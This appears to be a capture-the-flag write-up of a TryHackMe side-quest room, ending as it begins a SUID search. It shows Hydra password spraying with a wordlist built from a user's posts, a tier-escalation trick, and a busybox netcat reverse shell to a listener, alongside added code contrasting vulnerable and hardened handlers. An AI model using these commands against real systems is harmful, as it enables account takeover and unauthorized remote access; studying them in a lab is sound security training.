# The Great Disappearing Act

{% embed url="https://tryhackme.com/room/sq1-aoc2025-FzPnrt2SAu" %}

The following post by 0xb0b is licensed under [CC BY 4.0<img src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1" alt="" data-size="line"><img src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1" alt="" data-size="line">](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1)

***

After we have disabled the firewall using the web server on port `21337`, we begin with the challenge.

## Recon

We use rustscan to enumerate all TCP ports on the target machine and pipe the discovered ports into Nmap, which runs the default NSE scripts (`-sC`), service and version detection (`-sV`), and treats the host as online without an ICMP echo (`-Pn`).

```
rustscan -b 500 -a 10.80.172.227 -- -sC -sV -Pn
```

A batch size of `500` trades speed for stability; the default `1500` balances both, while much larger sizes increase throughput but risk missed responses and instability.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FRaDyuoSK2CgLaL0T25sN%2Fgrafik.png?alt=media&#x26;token=be4c8c00-2860-48ca-9394-45f02a01375e" alt=""><figcaption></figcaption></figure>

Our rustscan output shows that the target has several open ports: `22`, `80`, `8000`, `8080`, `9001`, and `13400`–`13404`. Port `21337` hosts the web server used to disable the firewall, so we leave it out. At first glance, a web server is running on most of these ports. Only on port `9001` do we appear to be dealing with a SCADA terminal.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2F7GuuIvJQsGX820sZKk7a%2Fgrafik.png?alt=media&#x26;token=5a38a445-217b-4741-b6f8-815f4b25cb51" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FWmbjarl7u8S8qjvZFiqQ%2Fgrafik.png?alt=media&#x26;token=2d00e1ee-0232-4d25-b894-1e04bf9c79f5" alt=""><figcaption></figcaption></figure>

We first open the web pages of the respective web services on the open ports manually. Ports `80` and `8080` appear to host the same page: the login page of the HopSec Security Console. Later on, we will find out that this is the portal where we redeem our flags.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FhxE9dTjBJmiNedaC4oXI%2Fgrafik.png?alt=media&#x26;token=f912c052-a105-44c0-8278-a79a3b7e8548" alt=""><figcaption></figcaption></figure>

As it turned out during the challenge, the page on port `80` is not fully functional. For the rest of the challenge, we use the console on port `8080`.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2F7USDeb0kHYldyhquz7MD%2Fgrafik.png?alt=media&#x26;token=ed197b6b-81f2-4eb5-ba5d-cbfaf1d14e24" alt=""><figcaption></figcaption></figure>

On port `8000`, we are greeted with a login page for Fakebook. Fakebook is a fake social media portal, which can also be found on GitHub. Vulnerabilities of this portal itself are not within the scope of the challenge.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FiMJ3lafEqtX30nBKLoUi%2Fgrafik.png?alt=media&#x26;token=e866b721-ba07-4b1a-a655-3f7673dfa234" alt=""><figcaption></figcaption></figure>

We can use netcat to connect to the SCADA terminal, which simulates the gate control system.

```
nc 10.80.172.227 9001
```

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FJt5ilMMGDwFm07w5yPdX%2Fgrafik.png?alt=media&#x26;token=bd300340-b12b-462b-b9a3-2c485deb0028" alt=""><figcaption></figcaption></figure>

The web server on port `13400` hosts a video portal, and here too we are required to log in first.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FzkvHFd3gjcHmv1GZ6kSC%2Fgrafik.png?alt=media&#x26;token=a7eb6200-4b24-4c39-a21b-12047071c21f" alt=""><figcaption></figcaption></figure>

## Flag 1

Since the Fakebook page is the only one that allows us to create an account and perform some authenticated recon, we will start with this page. We create an account.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FcyJ19M7vcMua0UNKfzhR%2Fgrafik.png?alt=media&#x26;token=b3da0c7b-4c2b-4310-8f28-a6e84fd12baa" alt=""><figcaption></figcaption></figure>

In one of the first posts on the portal, the user Guard Hopkins shares his email address. We make a note of it.

```
guard.hopkins@hopsecasylum.com
```

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2Fwmxxrs8TvN8OZMJ7WOSD%2Fgrafik.png?alt=media&#x26;token=28dd1e11-de43-496c-9fda-634d9adbdcea" alt=""><figcaption></figcaption></figure>

We scroll through the posts and see how Sir Carrotbane tricks users into sharing their passwords in the comments section. Guard Hopkins fell for it, and now we have his password. However, after testing Guard Hopkins' credentials on all available login pages, we can confirm that he has already changed it everywhere.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2Fmo1PnOvrMQW7gxUb3rbd%2Fgrafik.png?alt=media&#x26;token=9e36cbcc-a85e-45e9-9919-993fc94197ed" alt=""><figcaption></figcaption></figure>

The leaked password didn't work. But the user Hopkins provides enough material in his posts to create a word list.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FH682m5b0KX9ggQ6QuoSO%2Fgrafik.png?alt=media&#x26;token=1f2a64bb-43dd-450d-a2a6-7a1840467c4f" alt=""><figcaption></figcaption></figure>

The following screenshots illustrate the keywords we will use to create our word list.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2F5jHGYjlWdlaknqOMAHTg%2Fgrafik.png?alt=media&#x26;token=fbdbefc5-7976-4ba0-8adf-161d7faa5e19" alt=""><figcaption></figcaption></figure>

We have noted the following:

```
Pizza
Johnnyboy
43
anniversary
1982!
1234$
Hopkin
```

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2F2REhEHBJcGXXUa0Eqf3m%2Fgrafik.png?alt=media&#x26;token=c819d637-54c4-4f9f-b9fb-840b48b95310" alt=""><figcaption></figcaption></figure>

We also get a hint on how we could use this to create our word list: for example, with the combinator feature of hashcat, which joins every word of one list with every word of a second list into one list. The combinator mode is selected in hashcat with `-a 1`.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FJ366exgslJ9Fl0B2Wjxi%2Fgrafik.png?alt=media&#x26;token=dad9588e-94c9-43c7-b4cf-3e250c6312d3" alt=""><figcaption></figcaption></figure>

We write all the keywords we already know to a list and make a copy of it, giving us `list_a` and `list_b`.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FdRmTAbijtswd6Sqsi5kd%2Fgrafik.png?alt=media&#x26;token=50604fb3-bd38-4f2d-b6ae-b14d8496a2cc" alt=""><figcaption></figcaption></figure>

Next, we use the combinator feature to merge all combinations from both lists into one.

```
hashcat --stdout -a 1 list_a list_b > passwords.txt
```

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FIGdRR3mSTlL5vVw5onR8%2Fgrafik.png?alt=media&#x26;token=45d4a67d-9ed5-456c-8478-ef788068d809" alt=""><figcaption></figcaption></figure>

Since we have the email address and a set of candidate passwords, we run a dictionary attack against all portals using Hydra. Our first attempt on Fakebook failed, but we got a hit on the HopSec Security Console.

{% code overflow="wrap" %}

```
hydra -l 'guard.hopkins@hopsecasylum.com' -P passwords.txt 10.80.172.227 -s 8080 http-post-form "/cgi-bin/login.sh:username=^USER^&password=^PASS^:F=Invalid"
```

{% endcode %}

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FTWzm0cdLGRtQVa2dbQRi%2Fgrafik.png?alt=media&#x26;token=c1490b2f-75bc-460e-90c1-531154159923" alt=""><figcaption></figcaption></figure>

We log in...

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FTCPi59SWMVia7X6JpsWY%2Fgrafik.png?alt=media&#x26;token=f1a33387-3b72-462a-9804-9b4d88e096ba" alt=""><figcaption></figcaption></figure>

... and find the facility map as in the room description.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FFt0U5T3SVaw1wFKPRxL4%2Fgrafik.png?alt=media&#x26;token=d22626fe-baa1-48d6-8710-72219508d003" alt=""><figcaption></figcaption></figure>

When we click on the Cells / Storage key, we get the first flag.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2F0s2L8gyDHl1nWUrEUSPc%2Fgrafik.png?alt=media&#x26;token=f5a8571f-c58a-49a8-9e12-e820087ef743" alt=""><figcaption></figcaption></figure>

## Flag 2 Part 1

With Guard Hopkins' credentials, we can also log in to the Facility Video Portal.

```
http://10.80.172.227:13400/
```

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2F7eeSycL1CAMr22IAOTez%2Fgrafik.png?alt=media&#x26;token=b0cf97db-7ea2-41bd-8501-fab95e713fe4" alt=""><figcaption></figcaption></figure>

However, all video recordings appear to be compromised...

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FL8mEABrZf8QVfJQhS5vr%2Fgrafik.png?alt=media&#x26;token=c710790d-6d50-42b5-b76f-594f787a44c9" alt=""><figcaption></figcaption></figure>

... and access to the admin cam is restricted.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2F8Bl9QaipNGfvoClKPNUi%2Fgrafik.png?alt=media&#x26;token=eef70ac1-f277-437f-9f53-10eaac7e8716" alt=""><figcaption></figcaption></figure>

We click on cam-lobby and intercept the resulting request using Burp Suite.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FWVFamiViDNOOcAAEtc1a%2Fgrafik.png?alt=media&#x26;token=64bf1652-2843-4cc5-b946-ae8b2d588030" alt=""><figcaption></figcaption></figure>

After we have forwarded the request, another request follows to `/v1/streams/request`, which requests the stream via POST. The camera ID and the tier are defined in the POST body.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FSSB0UL0RvyLmiy8raJbg%2Fgrafik.png?alt=media&#x26;token=5214779c-c82d-4748-834f-4e7cb2528b56" alt=""><figcaption></figcaption></figure>

After we forward this request, another request follows, namely for the .m3u8 file. An M3U8 file is a playlist used for HTTP Live Streaming (HLS) that tells a media player where to find and play video or audio segments over the internet. It is a UTF-8 encoded text file, commonly used by streaming platforms to deliver adaptive bitrate streams.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FsnsVG8alsxk8e8Rl1eaL%2Fgrafik.png?alt=media&#x26;token=a2215696-5111-43bc-b5e3-0c7e092ceec2" alt=""><figcaption></figcaption></figure>

We repeat the whole process, but this time we send the request to `/v1/streams/request` to the Burp Suite Repeater. In the response, we see our effective tier as well as a ticket\_id.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FaypXxMarRxRbvo12ACPF%2Fgrafik.png?alt=media&#x26;token=3b086f1c-c1c8-4246-8207-fb23af202208" alt=""><figcaption></figcaption></figure>

We take a look at the JavaScript of the portal, its core logic in main.js. Here we see the camera\_id `cam-admin`.

```
view-source:http://10.80.172.227:13400/main.js
```

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FCnZ0s0vZcpslg6MbRRzt%2Fgrafik.png?alt=media&#x26;token=0c2b68f4-3e7b-4f49-b88b-2795b31c3d8c" alt=""><figcaption></figcaption></figure>

When we request `cam-admin`, we receive a ticket. When we use it to play the stream (more on how we do this later), we find that the compromised video is still being played. Furthermore, our effective tier is still guard.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FpNhuryWk6DVH0r5TzGK0%2Fgrafik.png?alt=media&#x26;token=64278c1f-d0ae-44a4-90c3-d75a63f0f8c8" alt=""><figcaption></figcaption></figure>

If we change the tier in the POST body, the effective tier stays the same and the ticket\_id still results in the compromised video.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FApU5UbRtQYiUA9wDB92n%2Fgrafik.png?alt=media&#x26;token=8639f0c9-f1a3-40b9-aab6-5ada9af67c8b" alt=""><figcaption></figcaption></figure>

To play the video, we take the ticket ID.

```
0ffc7b3b-7674-49d5-a18e-07c4c8a61f73
```

The site provides us with a function called `attachWithReconnect`, which we can use to play the video by passing the ticket ID. In the source, we also see the tiers guard and admin in use, so we were probably not wrong about the tier labeling.

```
attachWithReconnect(API + '/v1/streams/' + j.ticket_id + '/manifest.m3u8');
```

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FfjmG2bX7uFyOkVlsk3it%2Fgrafik.png?alt=media&#x26;token=7a0926a8-9ecb-4050-8b9f-ed89d554f9fa" alt=""><figcaption></figcaption></figure>

We execute this in the console with the ticket\_id resulting from the manipulated request. We see the compromised video.

{% code overflow="wrap" %}

```
attachWithReconnect(API + '/v1/streams/' + '0ffc7b3b-7674-49d5-a18e-07c4c8a61f73' + '/manifest.m3u8');
```

{% endcode %}

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FocbeiBOZlHavigRgLm9C%2Fgrafik.png?alt=media&#x26;token=2fc31a7b-14b9-4763-8536-a192e39a54c8" alt=""><figcaption></figcaption></figure>

We try something new and set the tier not only in the POST data but also as a GET parameter in the query string of the request. This time, we receive a response confirming that we are indeed in the admin tier.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FNqCJUttBukYyFC2B9zHy%2Fgrafik.png?alt=media&#x26;token=0bb01826-8467-4eb0-95e7-f1596aa9df2b" alt=""><figcaption></figcaption></figure>
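As an added illustration, not the video portal's code (which the write-up does not show), the following sketch reproduces the observed behaviour, a `tier` parameter in the query string overriding the tier of the logged-in session, next to a handler that derives the effective tier from the session alone. The policy tables, the `Session` and `Ticket` classes and the helper names are assumptions; only the field names and tier labels come from the write-up.

```python
# Added illustration (not the video portal's code, which the write-up does not show).
# Field names camera_id, tier, ticket_id and the tiers guard/admin are taken from the
# requests and responses seen in the write-up; the policy tables, classes and helper
# names below are constructed for this example.
import uuid
from dataclasses import dataclass

# Constructed policy: which tier a camera requires, and how tiers rank.
CAMERA_MIN_TIER = {"cam-lobby": "guard", "cam-admin": "admin"}
TIER_RANK = {"guard": 1, "admin": 2}


@dataclass
class Session:
    user: str
    tier: str  # tier established at login; the only trustworthy source


@dataclass
class Ticket:
    ticket_id: str
    camera_id: str
    effective_tier: str


def vulnerable_request_stream(session, query, body):
    """Reproduces the observed behaviour: a ``tier`` in the query string wins over
    the session tier (the POST-body tier is ignored), and the ticket is minted
    for whatever tier the client asked for."""
    effective = query.get("tier") or session.tier  # BUG: client-controlled precedence
    return Ticket(str(uuid.uuid4()), body["camera_id"], effective)


def hardened_request_stream(session, query, body):
    """Hardened variant: the effective tier comes only from the session; client
    tier hints in query or body are never read. Unknown cameras and insufficient
    tiers are refused before any ticket exists, so a ticket id can never stand
    for more than the session was entitled to."""
    camera_id = body.get("camera_id")
    required = CAMERA_MIN_TIER.get(camera_id)
    if required is None:
        raise PermissionError(f"unknown camera {camera_id!r}")
    if TIER_RANK[session.tier] < TIER_RANK[required]:
        raise PermissionError(f"{session.user} ({session.tier}) may not view {camera_id}")
    return Ticket(str(uuid.uuid4()), camera_id, session.tier)


def manifest_serves_real_feed(ticket):
    """Stand-in for the manifest endpoint: the real feed is served only when the
    ticket's tier satisfies the camera's requirement; otherwise the 'compromised'
    placeholder stream is returned (as the write-up observes for guard tickets)."""
    return TIER_RANK[ticket.effective_tier] >= TIER_RANK[CAMERA_MIN_TIER[ticket.camera_id]]


def is_denied(handler, session, query, body):
    """Helper for checks: True if the handler refuses the request."""
    try:
        handler(session, query, body)
    except PermissionError:
        return True
    return False


if __name__ == "__main__":
    guard = Session("guard.hopkins@hopsecasylum.com", "guard")
    body = {"camera_id": "cam-admin", "tier": "admin"}
    weak = vulnerable_request_stream(guard, {"tier": "admin"}, body)
    print("vulnerable handler, effective tier:", weak.effective_tier,
          "real feed:", manifest_serves_real_feed(weak))
    print("hardened handler denies:",
          is_denied(hardened_request_stream, guard, {"tier": "admin"}, body))
```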

We copy the ticket\_id...

```
ab8a4a69-3774-43f6-80d3-b24a611e48a9
```

... and request the stream again in the console. We can see how a code is entered on a number pad. We write down the code.

{% code overflow="wrap" %}

```
attachWithReconnect(API + '/v1/streams/' + 'ab8a4a69-3774-43f6-80d3-b24a611e48a9' + '/manifest.m3u8');
```

{% endcode %}

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2F0L0EJ1VqOBMEo8VdYjQH%2Fgrafik.png?alt=media&#x26;token=6d687d4a-4d62-40a7-9de7-5bc49929ee3e" alt=""><figcaption></figcaption></figure>

We go back to the portal on port `8080` and try to open the second door (Psych Ward Exit). We enter the keycode.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FJgqISCidJTg0NSN2SzC1%2Fgrafik.png?alt=media&#x26;token=1e5c3040-a5b7-4df0-a79a-f00ed2d59c6d" alt=""><figcaption></figcaption></figure>

And receive the first part of the second flag. We may have overlooked something: we have not yet dealt with ports `13401`-`13404`.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FTdoc4hWRtPNm989RJ57R%2Fgrafik.png?alt=media&#x26;token=b561c379-4aca-4867-9e4e-f858c11e79d1" alt=""><figcaption></figcaption></figure>

## Flag 2 Part 2

We repeat the steps from earlier and request the admin ticket for the cam-admin stream. This time, we take a closer look at the manifest file.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FfiGwsmJERRXnCS7nkkaJ%2Fgrafik.png?alt=media&#x26;token=b9d98225-036b-4b18-8c26-419eae0405c9" alt=""><figcaption></figcaption></figure>

From main.js, we can see how the URL for requesting the manifest file is constructed. In fact, it is accessed on port `13401`.

```
API + '/v1/streams/' + 'add1bb80-63e7-4c47-8304-5341637b507d' + '/manifest.m3u8'
```

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2Fx0wP0qHDXOEqJNN9prVk%2Fgrafik.png?alt=media&#x26;token=eeb6f79f-1f2a-4799-86c6-4d2fc0e0c819" alt=""><figcaption></figcaption></figure>

We craft the following URL to request the manifest:

{% code overflow="wrap" %}

```
http://10.80.172.227:13401/v1/streams/add1bb80-63e7-4c47-8304-5341637b507d/manifest.m3u8
```

{% endcode %}

We retrieve it.

{% code overflow="wrap" %}

```
wget http://10.80.172.227:13401/v1/streams/add1bb80-63e7-4c47-8304-5341637b507d/manifest.m3u8
```

{% endcode %}

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FrbihkKoq8wRBOcDpRb8C%2Fgrafik.png?alt=media&#x26;token=16a3d2d3-45c8-4050-aef1-d8014fbed563" alt=""><figcaption></figcaption></figure>

In this, we find the following two endpoints:

```
/v1/ingest/diagnostics
```

```
/v1/ingest/jobs
```
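The HLS playlist described earlier and the two endpoints found in it make the point that anything a manifest carries beyond its tags and segment URIs is readable by every client that can fetch it. As an added example (not from the write-up, the portal or the challenge), the small parser below separates tags, segments and free-form comment lines and reports paths or URLs found outside the stream itself. The sample playlist is constructed; only the two endpoint paths come from the write-up.

```python
# Added example: minimal HLS (M3U8) playlist parser that separates what a player
# needs (EXT tags, segment URIs) from free-form comments, and lists any URL or
# path found in those comments. The sample playlist is constructed for this
# example; only the two endpoint paths come from the write-up.
import re
from dataclasses import dataclass, field

SAMPLE_MANIFEST = """#EXTM3U
#EXT-X-VERSION:3
#EXT-X-TARGETDURATION:6
#EXT-X-MEDIA-SEQUENCE:0
# ingest diagnostics: POST /v1/ingest/diagnostics   (constructed comment line)
# job status: GET /v1/ingest/jobs/<job_id>          (constructed comment line)
#EXTINF:6.000,
seg0.ts
#EXTINF:6.000,
seg1.ts
#EXT-X-ENDLIST
"""

# Absolute URLs, or absolute paths preceded by whitespace/start of line.
PATH_RE = re.compile(r"https?://\S+|(?<!\S)/[\w./<>-]+")


@dataclass
class Playlist:
    tags: dict = field(default_factory=dict)        # EXT tag name -> value
    segments: list = field(default_factory=list)    # (duration seconds, uri)
    comments: list = field(default_factory=list)    # non-tag '#' lines, text only
    leaked_paths: list = field(default_factory=list)  # paths/URLs found in comments


def parse_m3u8(text):
    """Parse a playlist. Lines starting with '#EXT' are tags (EXTINF carries the
    duration of the segment URI on the following line); any other '#' line is a
    comment that a player ignores but a reader does not."""
    pl = Playlist()
    pending_duration = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#EXT"):
            name, _, value = line[1:].partition(":")
            if name == "EXTINF":
                pending_duration = float(value.split(",", 1)[0])
            else:
                pl.tags[name] = value
        elif line.startswith("#"):
            pl.comments.append(line[1:].strip())
            pl.leaked_paths.extend(PATH_RE.findall(line))
        else:
            pl.segments.append((pending_duration, line))
            pending_duration = None
    return pl


if __name__ == "__main__":
    pl = parse_m3u8(SAMPLE_MANIFEST)
    print("segments:", pl.segments)
    print("paths outside the stream:", pl.leaked_paths)
```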

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2Fs0EFzAD731RoCWfa9XgP%2Fgrafik.png?alt=media&#x26;token=e0b6ae72-4d1d-4409-9678-687ba0d577f2" alt=""><figcaption></figcaption></figure>

We cannot request `/v1/ingest/diagnostics` using a GET request.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FGqurBIwAXV8R8EV7ExZz%2Fgrafik.png?alt=media&#x26;token=be0e7eb0-7ab5-4757-b9fe-a640362ca18e" alt=""><figcaption></figcaption></figure>

But with a POST request, we receive an error stating that the rtsp\_url is invalid. An RTSP URL is used to control and stream live media (such as IP cameras or live broadcasts) by telling a client where and how to access the stream. It works like a remote control for streaming, handling play, pause, and stop commands in real time. At first glance, nothing special.

{% hint style="info" %}
In the early release version of the challenge, the note about the incorrect rtsp\_url was not included, which made this step particularly difficult.
{% endhint %}

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FTWYzRb3ZLZDPxK1WsfCb%2Fgrafik.png?alt=media&#x26;token=33666bfd-d1c9-4f9f-8515-a7b55e0655db" alt=""><figcaption></figcaption></figure>

Using localhost in the RTSP URL does not work.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2F2I8OovoayAmodhWmGlRw%2Fgrafik.png?alt=media&#x26;token=e12a1eff-b773-4872-8ba1-adad7e6c6879" alt=""><figcaption></figcaption></figure>

But we have an example in the manifest file.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2F17GJgILVpmDEkQNrPGaV%2Fgrafik.png?alt=media&#x26;token=41eee426-b48e-4c95-abd8-e0a0180c47ce" alt=""><figcaption></figcaption></figure>

If we use that, we get a response with a `job_status` that points to the other endpoint found in the manifest file.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FWLehlyTPYu5Ld1tjQmYj%2Fgrafik.png?alt=media&#x26;token=390549a0-1ba8-460d-b3f3-91707afbc60b" alt=""><figcaption></figcaption></figure>

When we request the following path, we receive the information that a console listens on port `13404`, together with a token.

```
/v1/ingest/jobs/5290b7f9-31ca-4815-af35-98323fe2597d
```

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FHdfrwTSnlyg7vX34Wl3B%2Fgrafik.png?alt=media&#x26;token=05654e25-52a4-4bc8-8b1e-5e40d8b3a835" alt=""><figcaption></figcaption></figure>

We connect to port `13404` using netcat, but do not receive a prompt. When we enter the token, a terminal appears.

```
nc 10.80.172.227 13404
```

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FylBcVk2iFF2u2jcUNzH1%2Fgrafik.png?alt=media&#x26;token=ddf4b681-7926-45f0-ac77-2f28cd44f5f2" alt=""><figcaption></figcaption></figure>

We want a slightly more stable shell, so we set up a listener using penelope and prepare a reverse shell.

```
penelope -p 4445
```

We spawn our reverse shell...

```
busybox nc 192.168.152.149 4445 -e /bin/bash
```

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FtrrboJXEsJJrwtNsTgmh%2Fgrafik.png?alt=media&#x26;token=4986555d-8942-42c5-b46f-d139d6412879" alt=""><figcaption></figcaption></figure>

... receive a connection and continue.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FVS2Sj4d2yGUTTktQE91O%2Fgrafik.png?alt=media&#x26;token=ee16dd3f-18fa-417b-9c37-e4f148593e36" alt=""><figcaption></figcaption></figure>

At `/home/svc_vidpot/user.txt` we find the second part of the second flag.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FsNW0RbFIymOknrtwUPjb%2Fgrafik.png?alt=media&#x26;token=76883350-453b-46ad-bf21-c9221af39b91" alt=""><figcaption></figcaption></figure>

## Flag 3

We remember the SCADA terminal: we now have tokens, such as the one we got for port `13404`, and already have two flags, so let's try them out. With a flag we can authenticate, but we can't do much here.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FuFIpsxGP7P7nR27FX685%2Fgrafik.png?alt=media&#x26;token=f353395a-9b07-421e-811a-21708262d057" alt=""><figcaption></figcaption></figure>

We still have our shell from the second part of the second flag. We search for SUID binaries and find one in particular.

```
find / -type f -perm -04000 2>/dev/null
```

